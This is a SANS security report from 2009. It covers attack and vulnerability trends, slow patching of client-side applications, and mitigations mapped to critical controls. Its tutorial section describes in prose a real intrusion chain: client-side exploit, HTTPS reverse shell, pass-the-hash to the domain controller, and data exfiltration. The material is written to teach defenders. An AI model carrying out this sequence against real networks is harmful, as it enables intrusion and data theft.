The most trusted source for computer security training, certification and research.



The Top Cyber Security Risks

Two risks dwarf all others, but organizations fail to mitigate them

Featuring attack data from TippingPoint intrusion prevention systems protecting 6,000 organizations, vulnerability data from 9,000,000 systems compiled by Qualys, and additional analysis and tutorial by the Internet Storm Center and key SANS faculty members.

September 2009

Contents

Executive summary
Overview
Vulnerability exploitation trends
Application vulnerabilities exceed OS vulnerabilities
Web application attacks
Windows: Conficker/Downadup
Apple: QuickTime and six more
Origin and destination analysis for four key attacks
Application patching is much slower than operating system patching
Tutorial: Real-life HTTP client-side exploitation example
Step 0: Attacker places content on trusted site
Step 1: Client-side exploitation
Step 2: Establish reverse shell backdoor using HTTPS
Steps 3 and 4: Dump hashes and use pass-the-hash attack to pivot
Step 5: Pass the hash to compromise domain controller
Steps 6 and 7: Exfiltration
Zero-day vulnerability trends
Best practices in mitigation and control of the top risks
Critical Controls - As Applied to HTTP Server Threats

Executive Summary

Priority One: Client-side software that remains unpatched.

Waves of targeted email attacks, often called spear phishing, are exploiting client-side vulnerabilities in commonly used programs such as Adobe PDF Reader, QuickTime, Adobe Flash and Microsoft Office. This is currently the primary initial infection vector used to compromise computers that have Internet access. Those same client-side vulnerabilities are exploited by attackers when users visit infected web sites. (See Priority Two below for how they compromise the web sites). Because the visitors feel safe downloading documents from the trusted sites, they are easily fooled into opening documents and music and video that exploit client-side vulnerabilities. Some exploits do not even require the user to open documents. Simply accessing an infected website is all that is needed to compromise the client software. The victims' infected computers are then used to propagate the infection and compromise other internal computers and sensitive servers incorrectly thought to be protected from unauthorized access by external entities. In many cases, the ultimate goal of the attacker is to steal data from the target organizations and also to install back doors through which the attackers can return for further exploitation. On average, major organizations take at least twice as long to patch client-side vulnerabilities as they take to patch operating system vulnerabilities. In other words the highest priority risk is getting less attention than the lower priority risk.

Priority Two: Internet-facing web sites that are vulnerable.

Attacks against web applications constitute more than 60% of the total attack attempts observed on the Internet. These vulnerabilities are being exploited widely to convert trusted web sites into malicious websites serving content that contains client-side exploits. Web application vulnerabilities such as SQL injection and Cross-Site Scripting flaws in open-source as well as custom-built applications account for more than 80% of the vulnerabilities being discovered. Despite the enormous number of attacks and despite widespread publicity about these vulnerabilities, most web site owners fail to scan effectively for the common flaws and become unwitting tools used by criminals to infect the visitors that trusted those sites to provide a safe web experience.

Operating systems continue to have fewer remotely-exploitable vulnerabilities that lead to massive Internet worms.

Other than Conficker/Downadup, no new major worms for OSs were seen in the wild during the reporting period. Even so, the number of attacks against buffer overflow vulnerabilities in Windows tripled from May-June to July-August and constituted over 90% of attacks seen against the Windows operating system.

Rising numbers of zero-day vulnerabilities

World-wide there has been a significant increase over the past three years in the number of people discovering zero-day vulnerabilities, as measured by multiple independent teams discovering the same vulnerabilities at different times. Some vulnerabilities have remained unpatched for as long as two years. There is a corresponding shortage of highly skilled vulnerability researchers working for government and software vendors. So long as that shortage exists, the defenders will be at a significant disadvantage in protecting their systems against zero-day attacks. A large decline in the number of "PHP File Include" attacks appears to reflect improved processes used by application developers, system administrators, and other security professionals.

Overview

Throughout the developed world, governments, defense industries, and companies in finance, power, and telecommunications are increasingly targeted by overlapping surges of cyber attacks from criminals and nation-states seeking economic or military advantage. The number of attacks is now so large and their sophistication so great, that many organizations are having trouble determining which new threats and vulnerabilities pose the greatest risk and how resources should be allocated to ensure that the most probable and damaging attacks are dealt with first. Exacerbating the problem is that most organizations do not have an Internet-wide view of the attacks.

This report uses current data - covering March 2009 to August 2009 - from appliances and software in thousands of targeted organizations to provide a reliable portrait of the attacks being launched and the vulnerabilities they exploit. The report's purpose is to document existing and emerging threats that pose significant risk to networks and the critical information that is generated, processed, transmitted, and stored on those networks. This report summarizes vulnerability and attack trends, focusing on those threats that have the greatest potential to negatively impact your network and your business. It identifies key elements that enable these threats and associates these key elements with security controls that can mitigate your risk.

The report's target audience is major organizations that want to ensure their defenses are up-to-date and are tuned to respond to today's newest attacks and to the most pressing vulnerabilities. Data on actual attacks comes from intrusion prevention appliances deployed by TippingPoint that protect more than 6,000 companies and government agencies. Data on vulnerabilities that remain unpatched comes from appliances and software deployed by Qualys that monitor vulnerabilities and configuration errors in more than 9,000,000 systems, scanned more than 100,000,000 times so far in 2009. The patterns in the data are vetted by the senior staff at the Internet Storm Center and by the faculty of the SANS Institute responsible for SANS programs in hacker exploits, penetration testing, and forensics. In other words, these findings reflect a fusion of data and experience never before brought together.

The report also includes a pictorial description/tutorial on how some of the most damaging current attacks actually work. One of the most important findings in cybersecurity over the past several years has been the understanding most often asserted by White House officials that "offense must inform defense." Only people who understand how attacks are carried out can be expected to be effective defenders. The tutorial shows what actually happened in a very damaging attack and is excerpted from Ed Skoudis' SANS Hacker Exploits and Incident Handling class. It is included to boost defenders' understanding of current attack techniques.

The report was compiled by Rohit Dhamankar, Mike Dausin, Marc Eisenbarth and James King of TippingPoint with assistance from Wolfgang Kandek of Qualys, Johannes Ullrich of the Internet Storm Center, and Ed Skoudis and Rob Lee of the SANS Institute faculty.

Vulnerability Exploitation Trends

Application Vulnerabilities Exceed OS Vulnerabilities

During the last few years, the number of vulnerabilities being discovered in applications is far greater than the number of vulnerabilities discovered in operating systems. As a result, more exploitation attempts are recorded on application programs. The most "popular" applications for exploitation tend to change over time since the rationale for targeting a particular application often depends on factors like prevalence or the inability to effectively patch. Due to the current trend of converting trusted web sites into malicious servers, browsers and client-side applications that can be invoked by browsers seem to be consistently targeted.

Number 
of Vulnerabilities in Network, OS and Applications

Figure 1: Number of Vulnerabilities in Network, OS and Applications

Web Application Attacks

There appear to be two main avenues for exploiting and compromising web servers: brute force password guessing attacks and web application attacks. Microsoft SQL, FTP, and SSH servers are popular targets for password guessing attacks because of the access that is gained if a valid username/password pair is identified. SQL Injection, Cross-site Scripting and PHP File Include attacks continue to be the three most popular techniques used for compromising web sites. Automated tools, designed to target custom web application vulnerabilities, make it easy to discover and infect several thousand web sites.

Windows: Conficker/Downadup

Attacks on Microsoft Windows operating systems were dominated by Conficker/ Downadup worm variants. For the past six months, over 90% of the attacks recorded for Microsoft targeted the buffer overflow vulnerability described in the Microsoft Security Bulletin MS08-067. Although in much smaller proportion, Sasser and Blaster, the infamous worms from 2003 and 2004, continue to infect many networks.

Attacks 
on Critical Microsoft Vulnerabilities

Figure 2: Attacks on Critical Microsoft Vulnerabilities (last 6 months)

Attacks 
on Critical Microsoft Vulnerabilities

Figure 3: Attacks on Critical Microsoft Vulnerabilities (last 6 months)

Apple: QuickTime and Six More

Apple has released patches for many vulnerabilities in QuickTime over the past year. QuickTime vulnerabilities account for most of the attacks that are being launched against Apple software. Note that QuickTime runs on both Mac and Windows Operating Systems. The following vulnerabilities should be patched for any QuickTime installations: CVE-2009-0007, CVE-2009-0003, CVE-2009-0957

Attacks 
on Critical Apple Vulnerabilities

Figure 4: Attacks on Critical Apple Vulnerabilities (last 6 months)

Origin and Destination Analysis for Four Key Attacks

Over the past six months, we have seen some very interesting trends when comparing the country where various attacks originate to the country of the attack destination. In order to show these results, we have characterized and presented the data in relation to the most prevalent attack categories. The analysis performed for this report identified these attack categories as high-risk threats to most if not all networks, and as such, should be at the forefront of security practitioners' minds. These categories are Server-Side HTTP attacks, Client-Side HTTP attacks, PHP Remote File Include, Cross-site Scripting attacks, and finally SQL Injection attacks. As you might expect, there is some overlap in these categories, with the latter three being subsets of the first two categories. However, the trends we see in separating this data is worth pointing out.

The SQL Injection attacks that compose this category include "SQL Injection using SELECT SQL Statement", "SQL Injection Evasion using String Functions", and "SQL Injection using Boolean Identity". The most prominent "PHP Remote File Include attack" is one that looks for a very small HTTP request that includes a link to another website as a parameter that contains a very specific evasion technique used by a number of attacks to increase the reliability of their attacks. Also of note is a very specific attack against the "Zeroboard PHP" application, the only single application that made the top attacks. The final type of attack included in these statistics is one of the more popular "HTTP Connect Tunnel" attacks, which remains a staple in the Server-Side HTTP category. The HTTP connect tunnels are used for sending spam emails via mis-configured HTTP servers.

Looking at the breakdown by country we see that the United States is by far the major attack target for the Server-Side HTTP attack category (Figure 5).

Server-Side HTTP Attacks by Destination Country

Figure 5: Server-Side HTTP Attacks by Destination Country (last 6 months)

For years, attack targets in the United States have presented greater value propositions for attackers, so this statistic really comes as no surprise.

An interesting spike in Server-Side HTTP attacks occurred in July 2009. This was entirely due to SQL Injection attacks using the SELECT command. Upon looking at the data, we saw a massive campaign by a range of IP addresses located at a very large Internet Server Provider (ISP). In this case, there were a number of machines located at a single collocation site that may have all been compromised with the same vulnerability due to the machines being at the same patch level. In addition, a number of gambling sites took part in this attack which peaked after hours on July Fourth, a major holiday in the United States.

Server-Side HTTP Attacks

Figure 6: Server-Side HTTP Attacks (last 6 months)

Finally let's turn to the source of these HTTP Server-Side Attacks (Figure 7).

Server-Side HTTP Attacks by Source Country

Figure 7: Server-Side HTTP Attacks by Source Country (last 6 months)

Here we see the United States as by far the largest origin, which is a pattern that has continued for some time. In many cases we believe these to be compromised machines that are then being used for further nefarious purposes. The next four offenders on the HTTP Server-Side attacking countries list are Thailand, Taiwan, China, and the Republic of Korea. They also show up in other portions of this report, so this graph will be a useful reference in comparing some of the other attack categories and their relative magnitude.

The last six months have seen a lot of activity with SQL injection attacks. Some typical patterns emerge with the United States being both the top source of and destination for SQL Injection events.

SQL Injection on the internet can more or less be divided into two sub-categories: Legitimate SQL Injection and Malicious SQL Injection. Many web applications on the Internet still use "SQL Injection" for their normal functionality. It should be noted that this is only a difference in intent. The web applications that legitimately use SQL Injection are guaranteed to be vulnerable to the tools and techniques used by attackers to perform Malicious SQL Injections. The servers that house these applications may have a higher compromise rate not only because they are known to be vulnerable, but also because they need to distinguish between legitimate and malicious injects to identify attacks.

SQL 
Injection Attacks by Destination Country

Figure 8: SQL Injection Attacks by Destination Country (last 6 months)

Looking at the magnitude of these attacks broken down by month (Figure 9), we see the large-scale SQL Injection campaign pointed out in the Server-Side HTTP Attack section.

A very large spike in SQL Injection attacks in July was caused mostly by an online advertiser who distributed code to many affiliates using SQL injection as functionality. The application was quickly pulled, resulting in a large drop in events for the month of August.

SQL 
Injection Attacks

Figure 9: SQL Injection Attacks (last 6 months)

The source distribution of many of these attacks is much more diverse than the destination. China is now the single largest source outside of the United States. Again the overwhelming destination for these events is in the United States. (Figure 10).

SQL 
Injection Attacks by Source Country

Figure 10: SQL Injection Attacks by Source Country (last 6 months)

In conclusion, we cannot overstate the importance of protecting DMZ-based web applications from SQL Injection attacks. Increasingly, the ultimate objective of attackers is the acquisition of sensitive data. While the media may consistently report attacker targets as being credit cards and social security numbers, that is more due to the popular understanding of the marketability of this data. They are not the only valuable data types that can be compromised. Since SQL Injection attacks offer such easy access to data, it should be assumed that any valuable data stored in a database accessed by a web server is being targeted.

Although "PHP File Include" attacks have been popular, we have seen a notable decline in the overall number of attacks that have taken place. With the exception of a major attacks originating from Thailand in April, the number of PHP File Include attacks in August is less than half the March/May average.

There are many ways to protect against these attacks. Apache configuration, input sanitization, and network security equipment are all very good at deterring these attacks, so it seems likely that the drop in total attacks is at least partly due to a positive response by application developers, system administrators, and security professionals. However, due to the extreme ease with which these attacks are carried out, and the enormous benefit of a successful attack (arbitrary PHP code is executed.), attacks such as these are likely to remain popular for some time.

PHP 
Remote File Include Attacks

Figure 11: PHP Remote File Include Attacks (last 6 months)

Let us look at the sources of "PHP Remote File Include" attacks. A major attack campaign was launched out of Thailand in April that caused Thailand to show up at number 1 in this list.

PHP 
Remote File Include Attacks by Source Country

Figure 12: PHP Remote File Include Attacks by Source Country (last 6 months)

Cross Site Scripting (XSS) is one of the most prevalent bugs in today's web applications. Unfortunately, developers often fall in the trap of introducing XSS bugs while creating custom code that connects all of the diverse web technologies that are so prevalent in today's Web 2.0 world. Another very common "use" of XSS is by various advertisers' analytic systems. For example, an advertiser's banner might be embedded in a web page which is set up to reflect some JavaScript off of the advertiser's HTTP server for tracking purposes. However, in this case, there is little risk because the site in question (usually) has full control over his/her page, so this request to the advertiser is not generally malicious. It is the "reflection" attacks, along with attacks that leverage flaws in form data handling, that make up the vast majority of XSS attacks that we have seen in the last six months.

XSS 
Attacks by Source Country

Figure 13: XSS Attacks by Source Country (last 6 months)

Attacks sourced from the United States have been on a steady decline month-over-month. The Republic of Korea has seen a 50% reduction in the last 30 days. These two events however have been offset by a sudden 20% increase in the last 30 days in attacks from Australia. The other three major players, namely, Hong Kong, China and Taiwan have remained stable over the past three month periods in this category.

Application Patching is Much Slower than Operating System Patching

Qualys scanners collect anonymized data of detected vulnerabilities to capture the changing dynamics in the vulnerability assessment field. The data documents changes such as the decline of server side vulnerabilities and the corresponding rise of vulnerabilities on the client side, both in operating system components and applications. A Top 30 ranking is used often to see if major changes occur in the most frequent vulnerabilities found. Here is the ranking for the first half of 2009 TH edited to remove irrelevant data points such as 0-day vulnerabilities.

Description

  1. WordPad and Office Text Converters Remote Code Execution Vulnerability (MS09-010)
  2. Sun Java Multiple Vulnerabilities (244988 and others)
  3. Sun Java Web Start Multiple Vulnerabilities May Allow Elevation of Privileges(238905)
  4. Java Runtime Environment Virtual Machine May Allow Elevation of Privileges (238967)
  5. Adobe Acrobat and Adobe Reader Buffer Overflow (APSA09-01)
  6. Microsoft SMB Remote Code Execution Vulnerability (MS09-001)
  7. Sun Java Runtime Environment GIF Images Buffer Overflow Vulnerability
  8. Microsoft Excel Remote Code Execution Vulnerability (MS09-009)
  9. Adobe Flash Player Update Available to Address Security Vulnerabilities (APSB09-01)
  10. Sun Java JDK JRE Multiple Vulnerabilities (254569)
  11. Microsoft Windows Server Service Could Allow Remote Code Execution (MS08-067)
  12. Microsoft Office PowerPoint Could Allow Remote Code Execution (MS09-017)
  13. Microsoft XML Core Services Remote Code Execution Vulnerability (MS08-069)
  14. Microsoft Visual Basic Runtime Extended Files Remote Code Execution Vulnerability (MS08-070)
  15. Microsoft Excel Multiple Remote Code Execution Vulnerabilities (MS08-074)
  16. Vulnerabilities in Microsoft DirectShow Could Allow Remote Code Execution (MS09-028)
  17. Microsoft Word Multiple Remote Code Execution Vulnerabilities (MS08-072)
  18. Adobe Flash Player Multiple Vulnerabilities (APSB07-20)
  19. Adobe Flash Player Multiple Security Vulnerabilities (APSB08-20)
  20. Third Party CAPICOM.DLL Remote Code Execution Vulnerability
  21. Microsoft Windows Media Components Remote Code Execution Vulnerability (MS08-076)
  22. Adobe Flash Player Multiple Vulnerabilities (APSB07-12)
  23. Microsoft Office Remote Code Execution Vulnerability (MS08-055)
  24. Adobe Reader JavaScript Methods Memory Corruption Vulnerability (APSA09-02 and APSB09-06)
  25. Microsoft PowerPoint Could Allow Remote Code Execution (MS08-051)
  26. Processing Font Vulnerability in JRE May Allow Elevation of Privileges(238666)
  27. Microsoft Office Could Allow Remote Code Execution (MS08-016)
  28. Adobe Acrobat/Reader "util.printf()" Buffer Overflow Vulnerability (APSB08-19)
  29. Adobe Acrobat and Adobe Reader Multiple Vulnerabilities (APSB08-15)
  30. Windows Schannel Security Package Could Allow Spoofing Vulnerability (MS09-007)

Table 1: Qualys Top 30 in H1 2009

Some of the vulnerabilities listed in the table get quickly addressed by IT administrators TH vulnerabilities in the base operating system class, for example, show a significant drop in even the first 15 days of their lifetime:

Microsoft OS Vulnerabilities

Figure 14: Microsoft OS Vulnerabilities

But at least half of the vulnerabilities in the list, primarily vulnerabilities found in applications, receive less attention and get patched on a much slower timeline. Some of these applications, such as Microsoft Office and Adobe Reader are very widely installed and so expose the many systems they run on to long lived threats. The following graphs plot the number of vulnerabilities detected for Microsoft Office and Adobe Reader normalized to the maximum number of vulnerabilities detected in the timeframe. Periodic drops in detection rates occur during the weekends when scanning focuses on servers rather than desktop machines and the detection rates of vulnerabilities related to desktop software fall accordingly.

Microsoft PowerPoint Vulnerabilities Patching Cycles Adobe 
Vulnerabilities Patching Cycles

Figure 15: Microsoft PowerPoint and Adobe Vulnerabilities Patching Cycles

Attackers have long picked up on this opportunity and have switched to different types of attacks in order to take advantage of these vulnerabilities, using social engineering techniques to lure end-users into opening documents received by e-mail or by infecting websites with links to documents that have attacks for these vulnerabilities embedded. These infected documents are not only placed on popular web sites that have a large number of visitors, but increasingly target the "long-tail", the thousands of specialized websites that have smaller but very faithful audiences. By identifying and exploiting vulnerabilities in the Content Management Systems used by these sites, attackers can automate the infection process and reach thousands of sites in a matter of hours. Attacks using PDF vulnerabilities have seen a large increase in late 2008 and 2009 as it became clear to attackers how easy it is to use this method of getting control over a machine.

Adobe Flash has similar problems with the applications of its updates TH there are four Flash vulnerabilities in our Top 30 list that date back as far as 2007:

Flash 
Vulnerabilities

Figure 16: Flash Vulnerabilities

Flash presents additional challenges: it does not have its automatic update mechanism and one needs to patch Internet Explorer in a separate step from other browsers. For users that have more than one browser installed, it is quite easy to forget to completely close Flash vulnerabilities and continue to be unwillingly vulnerable.

One of the other software families that is high on the Top 30 list is Java, which is widely installed for running Java applets in the common browsers and also increasingly for normal applications. It is quite slow in the patch cycle, with actually increasing numbers of total vulnerabilities as the introduction of new vulnerabilities outweighs the effect of patching. Java has the additional problem that until recently new versions did not uninstall the older code, but only pointed default execution paths to the new, fixed version; attack code could be engineered to take advantage of the well-known paths and continue to use older and vulnerable Java engines.

Sun 
Java Vulnerabilities

Figure 17: Sun Java Vulnerabilities

Tutorial: Real Life HTTP Client-side Exploitation Example

This section illustrates an example of a real life attack conducted against an organization that resulted in loss of critical data for the organization.

In this attack, Acme Widgets Corporation suffered a major breach from attackers who were able to compromise their entire internal network infrastructure using two of the most powerful and common attack vectors today: Exploitation of client-side software and pass-the-hash attacks against Windows machines.

Step 0: Attacker Places Content on Trusted Site

In Step 0, the attacker begins by placing content on a trusted third-party website, such as a social networking, blogging, photo sharing, or video sharing website, or any other web server that hosts content posted by public users. The attacker's content includes exploitation code for unpatched client-side software.

Step 0 
Diagram

Step 1: Client-Side Exploitation

In Step 1, a user on the internal Acme Widgets enterprise network surfs the Internet from a Windows machine that is running an unpatched client-side program, such as a media player (e.g., Real Player, Windows Media Player, iTunes, etc.), document display program (e.g., Acrobat Reader), or a component of an office suite (e.g., Microsoft Word, Excel, Powerpoint, etc.). Upon receiving the attacker's content from the site, the victim user's browser invokes the vulnerable client-side program passing it the attacker's exploit code. This exploit code allows the attacker to install or execute programs of the attacker's choosing on the victim machine, using the privileges of the user who ran the browser. The attack is partially mitigated because this victim user does not have administrator credentials on this system. Still, the attacker can run programs with those limited user privileges.

Step 1 
Diagram

Step 2: Establish Reverse Shell Backdoor Using HTTPS

In Step 2, the attacker's exploit code installs a reverse shell backdoor program on the victim machine. This program gives the attacker command shell access of the victim machine, communicating between this system and the attacker using outbound HTTPS access from victim to attacker. The backdoor traffic therefore appears to be regular encrypted outbound web traffic as far as the enterprise firewall and network is concerned.

Step 2 
Diagram

Steps 3 & 4: Dump Hashes and Use Pass-the-Hash Attack to Pivot

In Step 3, the attacker uses shell access of the initial victim system to load a local privilege escalation exploit program onto the victim machine. This program allows the attacker to jump from the limited privilege user account to full system privileges on this machine. Although vendors frequently release patches to stop local privilege escalation attacks, many organizations do not deploy such patches quickly, because such enterprises tend to focus exclusively on patching remotely exploitable flaws. The attacker now dumps the password hashes for all accounts on this local machine, including a local administrator account on the system.

Steps 3
 & 4 Diagram

In Step 4, instead of cracking the local administrator password, the attacker uses a Windows pass-the-hash program to authenticate to another Windows machine on the enterprise internal network, a fully patched client system on which this same victim user has full administrative privileges. Using NTLMv1 or NTLMv2, Windows machines authenticate network access for the Server Message Block (SMB) protocol based on user hashes and not the passwords themselves, allowing the attacker to get access to the file system or run programs on the fully patched system with local administrator privileges. Using these privileges, the attacker now dumps the password hashes for all local accounts on this fully patched Windows machine.

Step 5: Pass the Hash to Compromise Domain Controller

In Step 5, the attacker uses a password hash from a local account on the fully patched Windows client to access the domain controller system, again using a pass-the-hash attack to gain shell access on the domain controller. Because the password for the local administrator account is identical to the password for a domain administrator account, the password hashes for the two accounts are identical. Therefore, the attacker can access the domain controller with full domain administrator privileges, giving the attacker complete control over all other accounts and machines in that domain.

Step 5 
Diagram

Steps 6 and 7: Exfiltration

In Step 6, with full domain administrator privileges, the attacker now compromises a server machine that stores secrets for the organization. In Step 7, the attacker exfiltrates this sensitive information, consisting of over 200 Megabytes of data. The attacker pushes this data out to the Internet from the server, again using HTTPS to encrypt the information, minimizing the chance of it being detected.

Zero-Day Vulnerability Trends

A zero-day vulnerability occurs when a flaw in software code is discovered and code exploiting the flaw appears before a fix or patch is available. Once a working exploit of the vulnerability has been released into the wild, users of the affected software will continue to be compromised until a software patch is available or some form of mitigation is taken by the user.

The "File Format Vulnerabilities" continue to be the first choice for attackers to conduct zero-day and targeted attacks. Most of the attacks continue to target Adobe PDF, Flash Player and Microsoft Office Suite (PowerPoint, Excel and Word) software. Multiple publicly available "fuzzing" frameworks make it easier to find these flaws. The vulnerabilities are often found in 3rd party add-ons to these popular and wide-spread software suites, making the patching process more complex and increasing their potential value to attackers.

The notable zero-day vulnerabilities during past 6 months were:

  • Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862)
  • Microsoft Office Web Components ActiveX Control Code Execution Vulnerability (CVE-2009-1136)
  • Microsoft Active Template Library Header Data Remote Code Execution Vulnerability (CVE-2008-0015)
  • Microsoft DirectX DirectShow QuickTime Video Remote Code Execution Vulnerability (CVE-2009-1537)
  • Adobe Reader Remote Code Execution Vulnerability (CVE-2009-1493)
  • Microsoft PowerPoint Remote Code Execution Vulnerability (CVE-2009-0556)

The ease of finding zero-day vulnerabilities is a direct result of an overall increase in the number of people having skills to discover vulnerabilities world-wide. This is evidenced by the fact that TippingPoint DVLabs often receives the same vulnerabilities from multiple sources.

For example, MS08-031 (Microsoft Internet Explorer DOM Object Heap Overflow Vulnerability) was discovered independently by three researchers. The first researcher submitted remote IE 6/7 critical vulnerability on Oct 22, 2007. A second independent researcher submitted the same vulnerability on April 23, 2008. A third independent researcher submitted the same vulnerability on May 19, 2008. All three submissions outlined different approaches of auditing and finding the same vulnerability.

The implication of increasing duplicate discoveries is fairly alarming, in that the main mitigation for vulnerabilities of this type is patching, which is an invalid strategy for protecting against zero-day exploits. There is a heightened risk from cyber criminals, who can discover zero-day vulnerabilities and exploit them for profit. Add to this that software vendors have not necessarily lowered their average time for patching vulnerabilities reported to them, and that TippingPoint is aware of a number of vulnerabilities that were reported to vendors two years ago and are still awaiting a patch.

http://www.zerodayinitiative.com/advisories/upcoming/

This makes zero-day exploits in client-side applications one of the most significant threats to your network, and requires that you put in place additional information security measures and controls to complement your vulnerability assessment and remediation activities.

Best Practices in Mitigation and Control of The Top Risks

A few weeks ago, the Center for Strategic and International Studies published an updated version of the Twenty Critical Controls for Effective Cyber Defense.

http://csis.org/files/publication/Twenty_Critical_Controls_for_Effective_Cyber_Defense_CAG.pdf

These controls reflect the consensus of many of the nation's top cyber defenders and attackers on which specific controls must be implemented first to mitigate known cyber threats.

One of the most valuable uses of this report is to help organizations deploying the Twenty Critical Security Controls to be certain that no critical new attacks have been found that would force substantial changes in the Twenty Controls and at the same time to help people who are implementing the Twenty Critical Security Controls to focus their attention on the elements of the controls that need to be completed most immediately.

The Key Elements of these attacks and associated Controls:

  • User applications have vulnerabilities that can be exploited remotely,
    • Controls 2 (Inventory of Software), 3 (Secure Configurations), and 10 (Vulnerability Assessment and Remediation) can ensure that vulnerable software is accounted for, identified for defensive planning, and remediated in a timely manner. Control 5 (Boundary Defenses) can provide some prevention/detection capability when attacks are launched.
  • There is an increasing number of zero-days in these types of applications,
    • Control 12 (Malware Defenses) is the most effective at mitigating many of these attacks because it can ensure that malware entering the network is effectively contained. Controls 2, 3, and 10 have minimal impact on zero-day exploits and Control 5 can provide some prevention/detection capabilities against zero-days as well as known exploits.
  • Successful exploitation grants the attacker the same privileges on the network as the user and/or host that is compromised,
    • Control 5 (Boundary Defenses) can ensure that compromised host systems (portable and static) can be contained. Controls 8 (Controlled Use of Administrative Privileges) and 9 (Controlled Access) limit what access the attacker has inside the enterprise once they have successfully exploited a user application.
  • The attacker is masquerading as a legitimate user but is often performing actions that are not typical for that user.
    • Controls 6 (Audit Logs) and 11 (Account Monitoring and Control) can help identify potentially malicious or suspicious behavior and Control 18 (Incident Response Capability) can assist in both detection and recovery from a compromise.

Critical Controls - As Applied to HTTP Server Threats

As discussed previously, web application vulnerabilities and server-side HTTP threats pose a serious threat not only to the web servers you control, but also the servers that your users visit in day-to-day activities. Trends have indicated that SQL injection attacks are rising rapidly. SQL injection attacks are only valid if an application is written in such a way as to allow them; vulnerability is not a matter of configuration or (usually) access control.

The Key Elements of these attacks and associated Controls:

  • Web applications have vulnerabilities that can be easily discovered and exploited remotely include the following:
    • Control 7 (Application Software Security) is perhaps the most critical control regarding these types of attacks. Application developers should ensure that all input received from remote sources is sanitized of data meaningful to backend database systems. Control 5 (Boundary Defenses) can ensure that the appropriate layered protections are in place to prevent/detect attacks aimed at your web servers. Controls 2 (Inventory of Software), 3 (Secure Configurations), and 10 (Vulnerability Assessment and Remediation) can ensure that vulnerable applications are accounted for, identified for defensive planning, and remediated in a timely manner.
  • Successful exploitation grants the attacker the ability to put malicious code on the server and attempt to compromise all clients that browse that server.
    • Control 6 (Audit Logs) can assist in identifying when someone has compromised your web server. Control 18 (Incident Response Capability) can help mitigate the impact of, and assist in recovery from, attacks against vulnerable applications.

Contact us: (301) 654-SANS(7267)
Monday - Friday 9am-8pm EST/EDT